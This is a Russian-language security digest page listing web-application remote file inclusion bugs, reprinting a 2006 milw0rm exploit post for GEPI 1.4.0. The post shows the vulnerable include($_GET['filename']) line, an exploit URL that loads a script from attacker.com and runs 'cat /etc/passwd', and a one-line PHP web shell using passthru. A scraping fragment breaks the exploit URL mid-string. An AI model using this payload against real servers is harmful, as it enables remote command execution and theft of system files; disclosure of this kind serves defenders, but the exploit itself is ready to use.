Дополнительная информация Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl ) [ECHO_ADV_56$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion HITWEB Remote File Include Clanlite Remote File Include jamroom Remote File Include From:MILW0RM <submit_(at)_milw0rm.com> Date:31 октября 2006 г.Subject:GEPI <= 1.4.0 gestion/savebackup.php Remote File Include VulnerabilityPackage:- gepi 1.4.0 http://adullact.net/frs/download.php/992/gepi-1.4.0.tar.gz impact:- highly critical ..System Access.. vulnerable code:- include($_GET['filename']); in gepi/gestion/savebackup.php Exploit:- http://localhost/gepi/gestion/savebackup.php?filename=lass="fixed">http://attacker.com/test.txt&cmd=cat /etc/passwd in test.txt <? passthru("$_GET[cmd]");?> Credits:- $um$id # milw0rm.com [2006-10-31]
Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )
[ECHO_ADV_56$2006] P-Book <= 1.17 (pb_lang) Remote File Inclusion
HITWEB Remote File Include
Clanlite Remote File Include
jamroom Remote File Include
